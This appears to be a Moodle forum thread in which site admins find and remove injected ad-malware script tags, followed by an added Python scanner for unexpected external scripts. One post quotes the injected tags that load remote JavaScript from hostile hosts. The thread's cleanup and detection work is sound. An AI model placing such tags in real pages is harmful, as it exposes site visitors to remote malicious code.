I don't know if this is new or not. Some key words in the menu are linked to malicious sites. "Courses" is one of them. How do I get rid of these?
It's "powered by text enhanced".
Hi Dan,
Maybe this can help: http://wafflesatnoon.com/2011/10/05/seeing-unwanted-text-enhance-ads/
Google came up with a lot more when I typed in "powered by text enhanced". Not sure what's relevant to you.
Cheers,
Glenys
I had the same issue. Log in as admin and turn on editing. There is an "empty" box that appears at the top of the right hand column. I removed that and the ads are gone. Trying to find where it came from now. Will post when I find it.
Well, should have looked into it more before I deleted it. I just wanted the thing gone. Thinking it was an HTML block. Saw JavaScript code from other sites. This was one of them:
http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862
This was another:
http://loading-resource.com/data.geo.php?callback=window.__geo.getData
I just moved that particular site to a new host so gonna go through and check file permissions and such. Thinking this was a "hacker" attack.
Please let me know if anyone else is experiencing this.
Thanks!
Jenny
Just found it in the FrontPage settings front page description block. This is the code:
<p></p>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
<script src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862" type="text/javascript"></script>
Still not sure how it got there in the first place, but plan to keep an eye on the site.
I am going to post how I was able to track this down for anyone that had this problem.
I opened the Front Page and went to View Source. Then I searched for loading-resource.
For me the script appeared between two of my course listings. I went to the course directly above the script and found that the course was infected as well. In the course, I also viewed source and found and deleted all three instances of the script.
I also then changed the password of the offending teacher(!!) and notified her.
I will keep an eye on it but hope this maybe helps someone else.
Hi,
I am having this same problem and I found that some browser extensions added this script in text editors. Find and delete this extension.
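The manual check described in the thread (view source, then search for loading-resource) can be run over every stored HTML fragment at once, so infected course summaries are found together with the front page block. The sketch below is an added example, not code from any poster or from Moodle; the allowlisted host, the fragment names and the sample HTML are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only host this site legitimately loads scripts from (hypothetical).
ALLOWED_HOSTS = {"moodle.example.edu"}

class ScriptFinder(HTMLParser):
    """Collect the src of every <script> tag; inline scripts are recorded as None."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <SCRIPT SRC=...> matches too.
        if tag == "script":
            self.sources.append(dict(attrs).get("src"))

def scan_fragment(html):
    """Return findings for one stored fragment (block, summary, description)."""
    finder = ScriptFinder()
    finder.feed(html)
    finder.close()
    findings = []
    for src in finder.sources:
        if src is None:
            findings.append(("inline-script", None))
            continue
        # urlparse resolves the host for absolute and protocol-relative (//host/x) URLs;
        # site-relative paths have no host and are treated as same-origin.
        host = (urlparse(src.strip()).hostname or "").lower()
        if host and host not in ALLOWED_HOSTS:
            findings.append(("external-script", host))
    return findings

def scan_site(fragments):
    """Map each location name to its findings, leaving out clean fragments."""
    scanned = {name: scan_fragment(html) for name, html in fragments.items()}
    return {name: found for name, found in scanned.items() if found}

# Constructed sample: fragments as they might be exported from the site database.
SAMPLE = {
    "front page description": '<p></p><script src="http://loading-resource.com/'
    'data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>',
    "course 7 summary": '<p>Week 1</p><SCRIPT SRC="//Loading-Resource.com/x.js"></SCRIPT>',
    "course 8 summary": '<p>Clean</p><script src="/lib/javascript-static.js"></script>',
}

if __name__ == "__main__":
    print(scan_site(SAMPLE))
```

Scanning the stored content rather than the rendered page also catches scripts that were saved through a text editor, whichever way they got there.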